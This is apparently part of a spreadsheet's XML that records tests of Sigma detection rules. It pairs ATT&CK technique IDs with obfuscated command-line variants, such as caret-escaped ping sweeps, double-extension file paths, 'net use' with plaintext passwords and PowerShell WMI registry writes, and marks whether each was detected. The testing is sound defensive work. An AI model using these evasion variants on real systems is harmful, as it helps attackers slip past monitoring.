        <v>0</v>
      </c>
      <c r="H180" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I180" s="13" t="n"/>
      <c r="J180" s="24" t="n"/>
      <c r="K180" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="181" ht="15.75" customHeight="1" s="42">
      <c r="A181" s="26" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B181" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_double_extension</t>
        </is>
      </c>
      <c r="C181" s="9" t="inlineStr">
        <is>
          <t>Suspicious Double Extension File Execution</t>
        </is>
      </c>
      <c r="D181" s="9" t="inlineStr">
        <is>
          <t>1cdd9a09-06c9-4769-99ff-626e2b3991b8</t>
        </is>
      </c>
      <c r="E181" s="9" t="inlineStr">
        <is>
          <t>C:\Users\thaim\AppData\Local\Temp\T1036.007_masquerading.pdf".exe"</t>
        </is>
      </c>
      <c r="F181" s="16" t="b">
        <v>0</v>
      </c>
      <c r="G181" s="17" t="b">
        <v>0</v>
      </c>
      <c r="H181" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I181" s="13" t="n"/>
      <c r="J181" s="24" t="n"/>
      <c r="K181" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="182" ht="15.75" customHeight="1" s="42">
      <c r="A182" s="26" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B182" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_double_extension</t>
        </is>
      </c>
      <c r="C182" s="9" t="inlineStr">
        <is>
          <t>Suspicious Double Extension File Execution</t>
        </is>
      </c>
      <c r="D182" s="9" t="inlineStr">
        <is>
          <t>1cdd9a09-06c9-4769-99ff-626e2b3991b8</t>
        </is>
      </c>
      <c r="E182" s="9" t="inlineStr">
        <is>
          <t>C:\Users\thaim\AppData\Local\Temp\T1036.007_masquerading.pdf.lnk</t>
        </is>
      </c>
      <c r="F182" s="16" t="b">
        <v>0</v>
      </c>
      <c r="G182" s="17" t="b">
        <v>0</v>
      </c>
      <c r="H182" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I182" s="13" t="n"/>
      <c r="J182" s="24" t="n"/>
      <c r="K182" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="183" ht="15.75" customHeight="1" s="42">
      <c r="A183" s="26" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B183" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_double_extension</t>
        </is>
      </c>
      <c r="C183" s="9" t="inlineStr">
        <is>
          <t>Suspicious Double Extension File Execution</t>
        </is>
      </c>
      <c r="D183" s="9" t="inlineStr">
        <is>
          <t>1cdd9a09-06c9-4769-99ff-626e2b3991b8</t>
        </is>
      </c>
      <c r="E183" s="9" t="inlineStr">
        <is>
          <t>"C:\Users\thaim\AppData\Local\Temp\T1036.007_masquerading.pdf .exe"</t>
        </is>
      </c>
      <c r="F183" s="16" t="b">
        <v>0</v>
      </c>
      <c r="G183" s="17" t="b">
        <v>0</v>
      </c>
      <c r="H183" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I183" s="13" t="n"/>
      <c r="J183" s="24" t="n"/>
      <c r="K183" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="184" ht="15.75" customHeight="1" s="42">
      <c r="A184" s="41" t="n"/>
      <c r="B184" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_mssql_veaam_susp_child_processes</t>
        </is>
      </c>
      <c r="C184" s="41" t="inlineStr">
        <is>
          <t>Suspicious Child Process Of Veeam Dabatase</t>
        </is>
      </c>
      <c r="D184" s="41" t="inlineStr">
        <is>
          <t>d55b793d-f847-4eea-b59a-5ab09908ac90</t>
        </is>
      </c>
      <c r="E184" s="41" t="n"/>
      <c r="F184" s="41" t="n"/>
      <c r="G184" s="41" t="n"/>
      <c r="H184" s="41" t="n"/>
      <c r="I184" s="41" t="n"/>
      <c r="J184" s="41" t="n"/>
      <c r="K184" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="185" ht="15.75" customHeight="1" s="42">
      <c r="A185" s="41" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B185" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_double_extension</t>
        </is>
      </c>
      <c r="C185" s="41" t="inlineStr">
        <is>
          <t>Suspicious Double Extension File Execution</t>
        </is>
      </c>
      <c r="D185" s="41" t="inlineStr">
        <is>
          <t>1cdd9a09-06c9-4769-99ff-626e2b3991b8</t>
        </is>
      </c>
      <c r="E185" s="41" t="inlineStr">
        <is>
          <t>C:\Users\thaim\AppData\Local\Temp\T1036.007_masquerading.docx</t>
        </is>
      </c>
      <c r="F185" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G185" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H185" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I185" s="41" t="n"/>
      <c r="J185" s="41" t="n"/>
      <c r="K185" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="186" ht="15.75" customHeight="1" s="42">
      <c r="A186" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B186" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C186" s="41" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D186" s="41" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E186" s="41" t="inlineStr">
        <is>
          <t>net use \192.0.2.10\share -USER:domain\user password</t>
        </is>
      </c>
      <c r="F186" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G186" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H186" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I186" s="41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186" s="41" t="n"/>
      <c r="K186" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="187" ht="15.75" customHeight="1" s="42">
      <c r="A187" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B187" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C187" s="41" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D187" s="41" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E187" s="41" t="inlineStr">
        <is>
          <t>net use \192.0.2.10\share /USER:domain\user password</t>
        </is>
      </c>
      <c r="F187" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G187" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H187" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I187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187" s="41" t="n"/>
      <c r="K187" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="188" ht="15.75" customHeight="1" s="42">
      <c r="A188" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B188" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C188" s="41" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D188" s="41" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E188" s="41" t="inlineStr">
        <is>
          <t>net use "\192.0.2.10\share" /USER:domain\user password</t>
        </is>
      </c>
      <c r="F188" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G188" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H188" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I188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188" s="41" t="n"/>
      <c r="K188" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="189" ht="15.75" customHeight="1" s="42">
      <c r="A189" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B189" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C189" s="41" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D189" s="41" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E189" s="41" t="inlineStr">
        <is>
          <t>net	use	\192.0.2.10\share	/USER:domain\user	password</t>
        </is>
      </c>
      <c r="F189" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G189" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H189" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I189" s="41" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J189" s="41" t="n"/>
      <c r="K189" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="190" ht="15.75" customHeight="1" s="42">
      <c r="A190" s="41" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B190" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C190" s="41" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D190" s="41" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E190" s="41" t="inlineStr">
        <is>
          <t>net use \192.0.2.10\share /USER:"domain\user" password</t>
        </is>
      </c>
      <c r="F190" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G190" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H190" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I190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190" s="41" t="n"/>
      <c r="K190" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="191" ht="15.75" customHeight="1" s="42">
      <c r="A191" s="41" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B191" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_screenconnect_installation_cli_param</t>
        </is>
      </c>
      <c r="C191" s="41" t="inlineStr">
        <is>
          <t>Remote Access Tool - ScreenConnect Installation Execution</t>
        </is>
      </c>
      <c r="D191" s="41" t="inlineStr">
        <is>
          <t>75bfe6e6-cd8e-429e-91d3-03921e1d7962</t>
        </is>
      </c>
      <c r="E191" s="41" t="inlineStr">
        <is>
          <t>ScreenConnect.Client.exe "e=Access&amp;" "y=Guest&amp;" "&amp;p=77&amp;" "&amp;c=simulated&amp;" "&amp;k=test_key"</t>
        </is>
      </c>
      <c r="F191" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G191" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H191" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I191" s="41" t="n"/>
      <c r="J191" s="41" t="n"/>
      <c r="K191" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="192" ht="15.75" customHeight="1" s="42">
      <c r="A192" s="41" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B192" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_teamviewer_incoming_connection</t>
        </is>
      </c>
      <c r="C192" s="41" t="inlineStr">
        <is>
          <t>Remote Access Tool - Team Viewer Session Started On Windows Host</t>
        </is>
      </c>
      <c r="D192" s="41" t="inlineStr">
        <is>
          <t>ab70c354-d9ac-4e11-bbb6-ec8e3b153357</t>
        </is>
      </c>
      <c r="E192" s="41" t="inlineStr">
        <is>
          <t>"C:\Program Files\TeamViewer\TeamViewer_Desktop.exe" --Module 1 --IPCport 5939</t>
        </is>
      </c>
      <c r="F192" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G192" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H192" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I192" s="41" t="n"/>
      <c r="J192" s="41" t="n"/>
      <c r="K192" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="193" ht="15.75" customHeight="1" s="42">
      <c r="A193" s="41" t="inlineStr">
        <is>
          <t>t1133</t>
        </is>
      </c>
      <c r="B193" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_teamviewer_incoming_connection</t>
        </is>
      </c>
      <c r="C193" s="41" t="inlineStr">
        <is>
          <t>Remote Access Tool - Team Viewer Session Started On Windows Host</t>
        </is>
      </c>
      <c r="D193" s="41" t="inlineStr">
        <is>
          <t>ab70c354-d9ac-4e11-bbb6-ec8e3b153357</t>
        </is>
      </c>
      <c r="E193" s="41" t="inlineStr">
        <is>
          <t>"C:\Program Files\TeamViewer\TeamViewer_Desktop.exe" --IPCport 5939 --Module 1</t>
        </is>
      </c>
      <c r="F193" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G193" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H193" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I193" s="41" t="n"/>
      <c r="J193" s="41" t="n"/>
      <c r="K193" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="194" ht="15.75" customHeight="1" s="42">
      <c r="A194" s="41" t="inlineStr">
        <is>
          <t>t1204</t>
        </is>
      </c>
      <c r="B194" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent</t>
        </is>
      </c>
      <c r="C194" s="41" t="inlineStr">
        <is>
          <t>Arbitrary Shell Command Execution Via Settingcontent-Ms</t>
        </is>
      </c>
      <c r="D194" s="41" t="inlineStr">
        <is>
          <t>24de4f3b-804c-4165-b442-5a06a2302c7e</t>
        </is>
      </c>
      <c r="E194" s="41" t="inlineStr">
        <is>
          <t>"C:\Windows\explorer.exe" "C:\Users\Public\SettingsShortcut.SettingContent-ms" "immersivecontrolpanel"</t>
        </is>
      </c>
      <c r="F194" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G194" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H194" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I194" s="41" t="n"/>
      <c r="J194" s="41" t="n"/>
      <c r="K194" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="195" ht="15.75" customHeight="1" s="42">
      <c r="A195" s="41" t="inlineStr">
        <is>
          <t>t1204</t>
        </is>
      </c>
      <c r="B195" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent</t>
        </is>
      </c>
      <c r="C195" s="41" t="inlineStr">
        <is>
          <t>Arbitrary Shell Command Execution Via Settingcontent-Ms</t>
        </is>
      </c>
      <c r="D195" s="41" t="inlineStr">
        <is>
          <t>24de4f3b-804c-4165-b442-5a06a2302c7e</t>
        </is>
      </c>
      <c r="E195" s="41" t="inlineStr">
        <is>
          <t>"C:\Windows\explorer.exe" "C:\Users\Public\SettingsShortcut.SettingContent""-ms"</t>
        </is>
      </c>
      <c r="F195" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G195" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H195" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I195" s="41" t="n"/>
      <c r="J195" s="41" t="n"/>
      <c r="K195" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="196" ht="15.75" customHeight="1" s="42">
      <c r="A196" s="41" t="inlineStr">
        <is>
          <t>t1204</t>
        </is>
      </c>
      <c r="B196" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent</t>
        </is>
      </c>
      <c r="C196" s="41" t="inlineStr">
        <is>
          <t>Arbitrary Shell Command Execution Via Settingcontent-Ms</t>
        </is>
      </c>
      <c r="D196" s="41" t="inlineStr">
        <is>
          <t>24de4f3b-804c-4165-b442-5a06a2302c7e</t>
        </is>
      </c>
      <c r="E196" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\explorer.exe" "C:\Users\Public\SettingsShortcut.SettingContent-m^s"</t>
        </is>
      </c>
      <c r="F196" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G196" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H196" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I196" s="41" t="n"/>
      <c r="J196" s="41" t="n"/>
      <c r="K196" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="197" ht="15.75" customHeight="1" s="42">
      <c r="A197" s="41" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B197" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_double_extension</t>
        </is>
      </c>
      <c r="C197" s="41" t="inlineStr">
        <is>
          <t>Suspicious Double Extension File Execution</t>
        </is>
      </c>
      <c r="D197" s="41" t="inlineStr">
        <is>
          <t>1cdd9a09-06c9-4769-99ff-626e2b3991b8</t>
        </is>
      </c>
      <c r="E197" s="41" t="inlineStr">
        <is>
          <t>C:\Users\thaim\AppData\Local\Temp\T1036.007_masquerading.docm.exe</t>
        </is>
      </c>
      <c r="F197" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G197" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H197" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I197" s="41" t="n"/>
      <c r="J197" s="41" t="n"/>
      <c r="K197" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="198" ht="15.75" customHeight="1" s="42">
      <c r="A198" s="41" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B198" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_double_extension</t>
        </is>
      </c>
      <c r="C198" s="41" t="inlineStr">
        <is>
          <t>Suspicious Double Extension File Execution</t>
        </is>
      </c>
      <c r="D198" s="41" t="inlineStr">
        <is>
          <t>1cdd9a09-06c9-4769-99ff-626e2b3991b8</t>
        </is>
      </c>
      <c r="E198" s="41" t="inlineStr">
        <is>
          <t>C:\Users\thaim\AppData\Local\Temp\T1036.007_masquerading.htm.exe</t>
        </is>
      </c>
      <c r="F198" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G198" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H198" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I198" s="41" t="n"/>
      <c r="J198" s="41" t="n"/>
      <c r="K198" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="199" ht="15.75" customHeight="1" s="42">
      <c r="A199" s="41" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B199" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_double_extension</t>
        </is>
      </c>
      <c r="C199" s="41" t="inlineStr">
        <is>
          <t>Suspicious Double Extension File Execution</t>
        </is>
      </c>
      <c r="D199" s="41" t="inlineStr">
        <is>
          <t>1cdd9a09-06c9-4769-99ff-626e2b3991b8</t>
        </is>
      </c>
      <c r="E199" s="41" t="inlineStr">
        <is>
          <t>C:\Users\thaim\AppData\Local\Temp\T1036.007_masquerading.pdf</t>
        </is>
      </c>
      <c r="F199" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G199" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H199" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I199" s="41" t="n"/>
      <c r="J199" s="41" t="n"/>
      <c r="K199" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="200" ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="202" ht="15.75" customHeight="1" s="42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</row>
    <row r="203" ht="15.75" customHeight="1" s="42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</row>
    <row r="204" ht="15.75" customHeight="1" s="42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</row>
    <row r="205" ht="15.75" customHeight="1" s="42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</row>
    <row r="206" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="208" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="210" ht="15.75" customHeight="1" s="42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</row>
    <row r="211" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="217" ht="15.75" customHeight="1" s="42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</row>
    <row r="218" ht="15.75" customHeight="1" s="42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</row>
    <row r="219" ht="15.75" customHeight="1" s="42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</row>
    <row r="220" ht="15.75" customHeight="1" s="42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</row>
    <row r="221" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="223" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="225" ht="15.75" customHeight="1" s="42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</row>
    <row r="226" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="232" ht="15.75" customHeight="1" s="42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</row>
    <row r="233" ht="15.75" customHeight="1" s="42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</row>
    <row r="961" ht="15.75" customHeight="1" s="42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</row>
    <row r="962" ht="15.75" customHeight="1" s="42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</row>
    <row r="963" ht="15.75" customHeight="1" s="42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</row>
    <row r="964" ht="15.75" customHeight="1" s="42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</row>
    <row r="965" ht="15.75" customHeight="1" s="42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</row>
    <row r="966" ht="15.75" customHeight="1" s="42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</row>
    <row r="967" ht="15.75" customHeight="1" s="42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</row>
    <row r="968" ht="15.75" customHeight="1" s="42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</row>
    <row r="969" ht="15.75" customHeight="1" s="42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</row>
    <row r="970" ht="15.75" customHeight="1" s="42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</row>
    <row r="971" ht="15.75" customHeight="1" s="42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</row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971"/>
  <dataValidations count="3">
    <dataValidation sqref="A2:A198" showDropDown="1" showInputMessage="0" showErrorMessage="1" allowBlank="1" type="list">
      <formula1>"t1047,t1204.002,t1218,t1566.001,t1059.001,t1059.003,t1059.005,t1059.007,t1218.001,t1218.010,t1218.011,t1566,t1021.002"</formula1>
    </dataValidation>
    <dataValidation sqref="J2:J198" showDropDown="1" showInputMessage="0" showErrorMessage="0" allowBlank="1" type="custom">
      <formula1>AND(ISNUMBER(J2),(NOT(OR(NOT(ISERROR(DATEVALUE(J2))), AND(ISNUMBER(J2), LEFT(CELL("format", J2))="D")))))</formula1>
    </dataValidation>
    <dataValidation sqref="F2:H198" showDropDown="1" showInputMessage="0" showErrorMessage="1" allowBlank="1" type="list">
      <formula1>"FALSE,TRUE"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63.86" customWidth="1" style="42" min="2" max="2"/>
    <col width="36" customWidth="1" style="42" min="3" max="3"/>
    <col width="38" customWidth="1" style="42" min="4" max="4"/>
    <col width="93.56999999999999" customWidth="1" style="42" min="5" max="5"/>
    <col width="18" customWidth="1" style="42" min="6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4" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B2" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C2" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D2" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E2" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F2" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G2" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2" s="43" t="n"/>
      <c r="J2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3" ht="22.5" customHeight="1" s="42">
      <c r="A3" s="44" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B3" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C3" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D3" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E3" s="44" t="inlineStr">
        <is>
          <t>powershell -"nop" -c "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F3" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3" s="43" t="n"/>
      <c r="J3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4" ht="22.5" customHeight="1" s="42">
      <c r="A4" s="44" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B4" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C4" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D4" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E4" s="44" t="inlineStr">
        <is>
          <t>powershell -NoProfile /"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F4" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4" s="43" t="n"/>
      <c r="J4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K4" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="5" ht="22.5" customHeight="1" s="42">
      <c r="A5" s="44" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B5" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C5" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D5" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E5" s="44" t="inlineStr">
        <is>
          <t>powershell -"nop" /"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F5" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G5" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H5" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I5" s="43" t="n"/>
      <c r="J5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K5" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="6" ht="22.5" customHeight="1" s="42">
      <c r="A6" s="44" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B6" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C6" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D6" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E6" s="44" t="inlineStr">
        <is>
          <t>powershell -"nop" -"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F6" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G6" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H6" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I6" s="43" t="n"/>
      <c r="J6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K6" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="7" ht="22.5" customHeight="1" s="42">
      <c r="A7" s="44" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B7" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_scan_loop</t>
        </is>
      </c>
      <c r="C7" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scan Loop Network</t>
        </is>
      </c>
      <c r="D7" s="44" t="inlineStr">
        <is>
          <t>f8ad2e2c-40b6-4117-84d7-20b89896ab23</t>
        </is>
      </c>
      <c r="E7" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "f^o^r /L %i in (1,1,254) do p^i^n^g -n 1 192.168.1.%i"</t>
        </is>
      </c>
      <c r="F7" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G7" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H7" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I7" s="43" t="n"/>
      <c r="J7" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K7" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="8" ht="22.5" customHeight="1" s="42">
      <c r="A8" s="44" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B8" s="44" t="inlineStr">
        <is>
